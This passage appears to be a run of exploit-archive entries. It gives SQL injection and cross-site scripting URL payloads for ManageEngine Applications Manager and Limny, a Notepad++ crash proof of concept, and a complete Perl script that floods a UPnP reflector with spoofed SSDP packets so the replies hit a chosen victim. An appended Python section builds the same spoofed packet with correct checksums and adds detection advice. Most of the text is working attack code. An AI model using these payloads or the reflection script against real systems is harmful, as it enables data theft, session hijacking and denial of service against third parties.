http://www.example.com/mobile/DetailsView.do?method=showMGDetails&groupId=10003645+UnION+SelEct+group_concat(table_NAME),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+WHERE+table_schema=database()--%20-
http://www.example.com/mobile/Search.do?method=mobileSearch&requestid=[SQL INJECTION]mobileSearchPage&viewName=Search
  22. source: https://www.securityfocus.com/bid/54753/info Limny is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Limny 3.3.1 is vulnerable; other versions may also be affected. http://www.example.com/limny-3.3.1/index.php?q=-1' or 57 = '55 [SQL
  23. source: https://www.securityfocus.com/bid/54759/info

ManageEngine Applications Manager is prone to multiple SQL-injection and multiple cross-site scripting vulnerabilities. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. ManageEngine Applications Manager 10.0 is vulnerable; prior versions may also be affected.

http://www.example.com/MyPage.do?method=viewDashBoard&forpage=1&addNewTab=true&selectedpageid=10000017+AND+1=1--%20-[BLIND SQL-INJECTION]
http://www.example.com/jsp/RCA.jsp?resourceid=10000624&attributeid=1900&alertconfigurl=%2FshowActionProfiles.do%3Fmethod%3DgetResourceProfiles%26admin%3Dtrue%26all%3Dtrue%26resourceid%3D-10000624'+AND+substring(version(),1)=4 [BLIND SQL-INJECTION]&Sat%20Jun%2023%202012%2000:47:25%20GMT+0200%20(EET)
http://www.example.com/showCustom.do?resourcename=null&type=EC2Instance&original_type=EC2Instance&name=&moname=i-3a96b773&tabId=1&baseid=10000015&resourceid=10000744&monitorname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&method=showDataforConfs
http://www.example.com/MyPage.do?method=viewDashBoard&forpage=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&addNewTab=true&selectedpageid=10000014
http://www.example.com/jsp/ThresholdActionConfiguration.jsp?resourceid=10000055&attributeIDs=101&attributeToSelect=101&redirectto=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://www.example.com/showresource.do?resourceid=10000189&type=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&moname=DNS+monitor&method=showdetails&resourcename=DNS+monitor&viewType=showResourceTypes
http://www.example.com/jsp/ThresholdActionConfiguration.jsp?resourceid=10000055&attributeIDs=101&attributeToSelect=101%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&redirectto=/common/serverinfo.do
http://www.example.com/ProcessTemplates.do?method=createProcessTemplate&templatetype=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
  24. # Title: Notepad++ - Crash
# Date: 10/07/2015
# Author: Rahul Pratap Singh (@0x62626262)
# Vendor Homepage: https://notepad-plus-plus.org
# Download: https://notepad-plus-plus.org/download/v6.7.3.html
# Version: v6.7.3
# Tested on: Windows_XP_x86 & Windows_7_x86

Incorrect theme file parsing that leads to a crash.

- Create a .xml file with numerous "A" characters (around 1000) in it and save it as test.xml
- Go to the directory "/appdata/roaming/notepad++/themes/" on Windows, paste the test.xml file into this theme folder and restart Notepad++
- Start Notepad++, go to Settings in the menu bar, select Style Configurator and select the test file in the theme selection option
- Hit the "Save and close" button; it will crash with an error message

Thanks
Rahul Pratap Singh
  25. #!/usr/bin/perl
#
# upnpd M-SEARCH ssdp:discover reflection
#
# Copyright 2015 (c) Todor Donev
# todor.donev@gmail.com
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# The SSDP protocol can discover Plug & Play devices,
# with uPnP (Universal Plug and Play). SSDP is HTTP
# like protocol and work with NOTIFY and M-SEARCH
# methods.
#
#
# Disclaimer:
# This or previous program is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk and educational
# purpose ONLY!
#
# Wireshark:
# udp.port eq 1900 || frame contains "HTTP/1.1 200 OK"
#
# See also:
# SSDP Reflection DDoS Attacks
# http://tinyurl.com/mqwj6xt
#
use Socket;

if ( $< != 0 ) {
    print "Sorry, must be run as root!\n";
    print "This script use RAW Socket.\n";
    exit;
}

my $ssdp   = (gethostbyname($ARGV[0]))[4];  # reflector (upnpd) address, packed (32 bits)
my $victim = (gethostbyname($ARGV[1]))[4];  # spoofed source address = victim, packed (32 bits)

print "[ upnpd M-SEARCH ssdp:discover reflection ]\n";
if (!defined $ssdp || !defined $victim) {
    print "[ Usage: $0 <upnpd> <victim>\n";
    print "[ <todor.donev\@gmail.com> Todor Donev ]\n";
    exit;
}
print "[ Sending SSDP packets: $ARGV[0] -> $ARGV[1]\n";

socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
setsockopt(RAW, 0, 1, 1) or die $!;
main();

# Main program
sub main {
    my $packet;
    $packet  = iphdr();
    $packet .= udphdr();
    $packet .= payload();   # b000000m...
    send_packet($packet);
}

# IP header (Layer 3)
# Note: the total length and checksum built here are not what goes on the wire;
# on Linux raw(7) always fills in the IPv4 total length and header checksum for
# IPPROTO_RAW sockets, which is what keeps this packet valid.
sub iphdr {
    my $ip_ver         = 4;                  # IP Version 4 (4 bits)
    my $iphdr_len      = 5;                  # IP Header Length (4 bits)
    my $ip_tos         = 0;                  # Differentiated Services (8 bits)
    my $ip_total_len   = $iphdr_len + 20;    # IP Header Length + Data (16 bits)
    my $ip_frag_id     = 0;                  # Identification Field (16 bits)
    my $ip_frag_flag   = 000;                # IP Frag Flags (R DF MF) (3 bits)
    my $ip_frag_offset = 0000000000000;      # IP Fragment Offset (13 bits)
    my $ip_ttl         = 255;                # IP TTL (8 bits)
    my $ip_proto       = 17;                 # IP Protocol (8 bits)
    my $ip_checksum    = 0;                  # IP Checksum (16 bits)

    # IP Packet construction
    my $iphdr = pack( 'H2 H2 n n B16 h2 c n a4 a4',
        $ip_ver . $iphdr_len, $ip_tos, $ip_total_len, $ip_frag_id,
        $ip_frag_flag . $ip_frag_offset, $ip_ttl, $ip_proto, $ip_checksum,
        $victim, $ssdp );
    return $iphdr;
}

# UDP header (Layer 4)
sub udphdr {
    my $udp_src_port = 31337;                  # UDP Source Port (16 bits) (0-65535)
    my $udp_dst_port = 1900;                   # UDP Dest Port (16 bits) (0-65535)
    my $udp_len      = 8 + length(payload());  # UDP Length (16 bits) (0-65535)
    my $udp_checksum = 0;                      # UDP Checksum (16 bits); zero = none (allowed for IPv4)

    # UDP Packet
    my $udphdr = pack( 'n n n n',
        $udp_src_port, $udp_dst_port, $udp_len, $udp_checksum );
    return $udphdr;
}

# SSDP HTTP like (Layer 7)
sub payload {
    my $data;
    $data .= "M-SEARCH * HTTP\/1.1\r\n";         #
    $data .= "HOST:239.255.255.250:1900\r\n";    # Multicast address
    $data .= "ST:upnp:rootdevice\r\n";           # Search target, search for root devices only
    $data .= "MAN:\"ssdp:discover\"\r\n";        #
    $data .= "MX:3\r\n\r\n";                     # Seconds to delay response
    my $payload = pack('a' . length($data), $data);
    return $payload;
}

sub send_packet {
    while(1){
        select(undef, undef, undef, 0.10);   # Sleeping 100 milliseconds
        send(RAW, $_[0], 0, pack('Sna4x8', PF_INET, 60, $ssdp)) or die $!;
    }
}
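The script above relies on the kernel to repair its IPv4 header (it leaves the checksum zero and computes the wrong total length) and sends UDP with no checksum. The following is an added example, not part of the script, showing the headers built correctly and the same SSDP query parsed back out as a detection check: the RFC 1071 one's-complement checksum, the UDP pseudo-header, the M-SEARCH payload, and a parser that recognises an `ssdp:discover` request. It only constructs and parses bytes; putting them on the wire would need a raw socket with `IP_HDRINCL` and root, which is deliberately not done here. The addresses are documentation ranges (assumed, not from the script).

```python
import socket
import struct

IPPROTO_UDP = 17


def internet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum, as used by the IPv4 header and by UDP/TCP."""
    if len(data) % 2:
        data = data + b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_msearch(st: str = "upnp:rootdevice", mx: int = 3) -> bytes:
    """The M-SEARCH 'ssdp:discover' query the Perl script sends (same headers, same order)."""
    lines = ["M-SEARCH * HTTP/1.1", "HOST:239.255.255.250:1900",
             "ST:" + st, 'MAN:"ssdp:discover"', "MX:%d" % mx]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def build_ipv4_udp(src_ip: str, dst_ip: str, sport: int, dport: int,
                   payload: bytes, ttl: int = 255) -> bytes:
    """IPv4 + UDP datagram with correct lengths and checksums (no fragmentation, no options)."""
    src, dst = socket.inet_aton(src_ip), socket.inet_aton(dst_ip)
    udp_len = 8 + len(payload)
    # The UDP checksum covers a pseudo-header (addresses, protocol, UDP length) plus the datagram.
    pseudo = src + dst + struct.pack("!BBH", 0, IPPROTO_UDP, udp_len)
    udp_hdr = struct.pack("!HHHH", sport, dport, udp_len, 0)
    udp_csum = internet_checksum(pseudo + udp_hdr + payload) or 0xFFFF  # 0 would mean "absent"
    udp_hdr = struct.pack("!HHHH", sport, dport, udp_len, udp_csum)
    # IPv4 header: ver/IHL, TOS, total length, id, flags/frag, TTL, proto, checksum, src, dst.
    fields = [0x45, 0, 20 + udp_len, 0, 0, ttl, IPPROTO_UDP, 0, src, dst]
    fields[7] = internet_checksum(struct.pack("!BBHHHBBH4s4s", *fields))
    return struct.pack("!BBHHHBBH4s4s", *fields) + udp_hdr + payload


def parse_ipv4_udp(pkt: bytes) -> dict:
    """Decode an IPv4/UDP packet and verify both checksums (what a capture tool would check)."""
    ihl = (pkt[0] & 0x0F) * 4
    ip_hdr = pkt[:ihl]
    _, _, total_len, _, _, ttl, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", ip_hdr[:20])
    sport, dport, udp_len, udp_csum = struct.unpack("!HHHH", pkt[ihl:ihl + 8])
    datagram = pkt[ihl:ihl + udp_len]
    pseudo = src + dst + struct.pack("!BBH", 0, proto, udp_len)
    return {
        "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst), "ttl": ttl, "proto": proto,
        "sport": sport, "dport": dport, "total_len": total_len,
        "ip_checksum_ok": internet_checksum(ip_hdr) == 0,
        "udp_checksum_ok": udp_csum == 0 or internet_checksum(pseudo + datagram) == 0,
        "payload": datagram[8:],
    }


def parse_msearch(payload: bytes):
    """Return the headers of an SSDP M-SEARCH 'ssdp:discover' request, or None for anything else."""
    try:
        text = payload.decode("ascii")
    except UnicodeDecodeError:
        return None
    head, _, _ = text.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    if request_line != "M-SEARCH * HTTP/1.1":
        return None
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    if headers.get("man") != '"ssdp:discover"':
        return None
    return headers


if __name__ == "__main__":
    # Constructed packet: spoofed source 192.0.2.10 (the "victim"), destination 198.51.100.20 (the reflector).
    pkt = build_ipv4_udp("192.0.2.10", "198.51.100.20", 31337, 1900, build_msearch())
    info = parse_ipv4_udp(pkt)
    print(len(pkt), "bytes;", info["src"], "->", info["dst"], "port", info["dport"])
    print("checksums ok:", info["ip_checksum_ok"], info["udp_checksum_ok"])
    print("ssdp:discover headers:", parse_msearch(info["payload"]))
```

The reflection works because the ~100-byte query above elicits a larger unicast response to whatever source address the header carries, so a responder on the public Internet should be treated as a misconfiguration; on the defensive side, an M-SEARCH arriving unicast from an address outside your own network, or any M-SEARCH leaving your edge toward port 1900, is the thing to alert on.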